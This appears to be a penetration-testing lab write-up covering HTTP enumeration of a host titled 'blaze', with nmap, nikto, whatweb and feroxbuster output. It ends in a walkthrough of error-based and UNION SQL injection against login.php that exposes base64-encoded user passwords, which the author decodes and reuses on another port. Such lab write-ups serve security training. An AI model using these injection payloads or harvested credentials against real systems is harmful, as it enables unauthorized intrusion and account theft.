Skip to main content

80 HTTP

HyperText Transport Protocol

Environment Variables / Setup
#

export IP=192.168.109.10
export PORT=80
export URL=http://$IP:$PORT

nmap
#

nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" 
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-feed: Couldn't find any feeds.
| http-php-version: Logo query returned unknown hash 862a0ac446ba7dfef3c7ff3026777e84
|_Credits query returned unknown hash 862a0ac446ba7dfef3c7ff3026777e84
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-malware-host: Host appears to be clean
|_http-title: blaze
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
|_http-date: Thu, 07 Aug 2025 23:23:49 GMT; 0s from local time.
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.109.10
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 82
|     Comment: 
|         /*   z-index: -1; */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 4
|     Comment: 
|         /* 
|         font-family: 'PT Sans', sans-serif;
|         font-family: 'Source Sans Pro', sans-serif;
|         font-family: 'Roboto Slab', serif;
|         font-family: 'Open Sans', sans-serif;
|         */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 181
|     Comment: 
|         /*   text-align:center; */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 177
|     Comment: 
|         /*    */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 67
|     Comment: 
|         /*   background-image:url("https://source.unsplash.com/l3N9Q27zULw"); */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 270
|     Comment: 
|         /* width: 110%; */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 23
|     Comment: 
|         /*  Colors  */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 90
|     Comment: 
|         /*   width:50%; */
|     
|     Path: http://192.168.109.10:80/css/index.css
|     Line number: 18
|     Comment: 
|_        /*  Fonts  */
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-errors: Couldn't find any error pages.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-mobileversion-checker: No mobile version detected.
| http-headers: 
|   Date: Thu, 07 Aug 2025 23:23:54 GMT
|   Server: Apache/2.4.41 (Ubuntu)
|   Last-Modified: Wed, 29 Mar 2023 06:51:19 GMT
|   ETag: "d15-5f8046741ae2b"
|   Accept-Ranges: bytes
|   Content-Length: 3349
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
| http-vhosts: 
|_128 names had status 200
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-sitemap-generator: 
|   Directory structure:
|     /
|       Other: 1
|     /css/
|       css: 1
|   Longest directory structure:
|     Depth: 1
|     Dir: /css/
|   Total files found (by extension):
|_    Other: 1; css: 1
|_http-chrono: Request times for /; avg: 285.53ms; min: 266.81ms; max: 334.22ms
| http-enum: 
|   /login.php: Possible admin folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.

nikto
#

nikto -ask=no -Tuning=x4567890ac -nointeractive -host http://192.168.109.10:80 2>&1
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: d15, size: 5f8046741ae2b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /login.php: Admin login page/section found.
+ 7729 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2025-08-07 16:38:49 (GMT-7) (907 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Identify Tech Stack
#

whatweb
#

whatweb $URL
http://192.168.109.10:80 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.109.10], Title[blaze]

Content Discovery
#

(Autorecon Feroxbuster)

feroxbuster -u http://192.168.109.10:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -r -o "/home/kali/cockpit/autorecon/results/192.168.109.10/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
200      GET      278l      506w     5366c http://192.168.109.10/css/index.css
200      GET       78l      321w     3349c http://192.168.109.10/
200      GET       29l       60w      477c http://192.168.109.10/css/type.css
200      GET       10l       28w      233c http://192.168.109.10/blocked.html
200      GET       65l      128w     1108c http://192.168.109.10/css/style.css
200      GET       18l       77w     1323c http://192.168.109.10/css/
200      GET       78l      321w     3349c http://192.168.109.10/index.html
200      GET      707l     4190w   598838c http://192.168.109.10/img/blaze.png
200      GET       16l       58w      935c http://192.168.109.10/img/
200      GET       29l       85w      913c http://192.168.109.10/js/index.js
200      GET       16l       60w      932c http://192.168.109.10/js/
200      GET       28l       63w      769c http://192.168.109.10/login.php
200      GET        0l        0w        0c http://192.168.109.10/db_config.php

Look into login.php below…

Robots.txt
#

curl $URL/robots.txt

(Does not exist)

Manual Enumeration
#

(Walk application functionality in Burp Suite)

The “Purchase” and “Buy now” buttons just link between anchors on the page.

The page’s title, “blaze,” is interesting.

login.php SQL injection
#

On /login.php, discovered in our feroxbuster enumeration, there is a login form. Some guesses at default credentials don’t work, but by entering a single quote in the username field, we find that the application leaks a MySQL error, indicating it’s vulnerable to error-based SQL injection.

I’ll continue enumerating this injection in the user field:

test ' UNION SELECT MySQL.User(); -- -

Error: execute command denied to user 'admin'@'localhost' for routine 'MySQL.User'

test ' UNION SELECT @@version; -- -

Error: The used SELECT statements have a different number of columns

Find number of columns returned by changing value: test ' ORDER BY 10;-- -;

Starting high and decrementing, it seems there are 5 columns, as any higher than that creates a MySQL error.

test ' ORDER BY 10;-- -;

Use this to get union clause injection working: test ' UNION SELECT @@version, NULL, NULL, NULL, NULL-- -

For some reason this redirects me to /password-dashboard.php, which displays usernames and passwords for ‘james’ and ‘cameron’ ????

james	Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron	dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

Decoding from base64, we have their passwords in plaintext (reminder to use secure password hashing algorithms when storing credentials – added to Findings as a further vulnerability):

james canttouchhhthiss@455152
cameron	thisscanttbetouchedd@455152

These credentials aren’t valid on this page, but james’ does work against 9090 HTTP – we’ll continue there.